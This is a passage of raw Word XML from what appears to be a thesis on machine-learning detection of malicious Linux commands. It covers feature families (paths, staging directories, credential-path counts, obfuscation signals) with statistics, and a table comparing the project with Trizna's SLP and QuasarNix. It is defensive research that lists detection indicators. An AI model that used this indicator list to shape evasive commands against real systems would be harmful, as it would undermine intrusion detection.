        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_dev_null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_heredoc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capture output suppression and inline payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>delivery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Paths and filesystem (5) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_abs_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_hidden_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_staging_dir</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_home_ref</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_sensitive_paths</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:t>names* proves to be more</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">informative than what it runs. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_abs_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the strongest single feature in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the set (d +0.45, AUC 0.73, top Random Forest Gini importance at 0.124 on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset 1) on the reasoning that absolute paths indicate an operator working</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>somewhere unfamiliar, without the benefit of a working directory or shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">history. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_staging_dir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> encodes the structural necessity behind </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/tmp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/dev/shm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — guaranteed-writable, and memory-backed in the latter case — and is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>one of the few features to keep both sign and magnitude across corpora (OR 14.3 /</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.75). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_sensitive_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is intentionally a lumped count: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_cred_paths</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_proc_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_log_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> each failed the gate individually and pool into</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">a feature that passes on both. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_home_ref</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is retained as a documented</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>counter-example, inverting from OR 2.02 to 0.38.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">**Obfuscation (6) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_base64_blob</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>b64_run_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_hex_escape</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>digit_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>special_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_quote_splice</w:t>
      </w:r>
      <w:r>
        <w:t>.** Obfuscation is the only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">adversarial behaviour that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>adds</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> signal, because the evasion is itself</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>anomalous: no benign workflow splices quotes through a binary name. The family</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>pairs sparse near-categorical flags with dense continuous ratios so that both</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">blatant and subtle cases are covered — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_quote_splice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at OR 27.0 is rare and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sharp, while </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>special_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (d +0.32, the second-largest effect in the set on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dataset 1) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>digit_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fire on every row. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>digit_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the most stable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">continuous feature in the whole project (+0.24 / +0.23), and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_hex_escape</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>most stable binary one (OR 22.3 / 11.7); encoding artefacts, unlike vocabulary,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">survive a change of corpus. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>b64_run_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> supplements the base64 flag with</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>magnitude, since a long unbroken encoded run is far more indicative than an</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>incidental base64-shaped token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>What the rejections contribute.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The 25 killed candidates are not noise. Three</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>patterns recur and each is an argument in its own right: features that were</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>redundant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>char_entropy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>token_entropy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dropped in favour of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_tokens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head_is_fetch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in favour of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_fetch_bin</w:t>
      </w:r>
      <w:r>
        <w:t>); features that</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">were </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>class-neutral</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> despite strong intuition (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_privesc_bin</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nonprintable_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); and features that were </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>too sparse individually</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> but</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>recoverable when pooled (the three path counters). Reporting them makes the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>43-feature set a result rather than a starting assumption, and it is what allows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 4's ranking to be read as evidence rather than as confirmation of the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>choices made here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:br w:type="page"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 2 — Literature Review: Trizna on ML for Linux Command Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Feature matrix — Trizna's approach vs. this project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Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Trizna — SLP (2021)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>This project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Feature type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">A purpose-built </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>shell tokenizer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (SLP) plus classical encodings (TF-IDF / hashing). The thesis: generic NLP tokenization mis-parses shell, so a shell-aware representation is needed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Hybrid</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — 43 engineered behavioral features (counts, ratios, entropies, MITRE binary-family flags) + character (3–5)-gram TF-IDF for the XGBoost-hybrid; a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>raw character-index sequence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> for the 1D-CNN.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Model type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Classical ML classifiers over SLP encodings (the paper's contribution is the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>representation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, not a new model). QuasarNix (2024) later adds an ensemble of classifiers with adversarially-trained variants.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>XGBoost, RandomForest, 1D-CNN, IsolationForest, and a TF-IDF+LR baseline, composed into a 3-stage cascade with LLM arbitration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dataset type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Real </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Linux `auditd`</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> telemetry (single-organization logs), supervised. QuasarNix instead uses </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>synthetic augmentation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — &gt;1M reverse-shell variants from ~34 templates.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Provenance-labeled, multi-source</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>: D1 curated corpora (HackTricks, GTFOBins, Atomic Red Team, PayloadsAllTheThings, QuasarNix, SLP) vs. D2 operational (Cowrie honeypot + real shell histories), held at an exact 1:3 attack:benign ratio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Evaluation metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">SLP: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, reporting a lift from </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.392 → 0.874</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> on its security-classification task. QuasarNix: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>detection rate at an industry-grade FPR = 10⁻⁵</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F1, ROC-AUC, PR-AUC, TPR@FPR=1%/0.1%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, plus per-source recall/FPR and near-duplicate-leakage audits.</w:t>
            </w:r>
          </w:p>
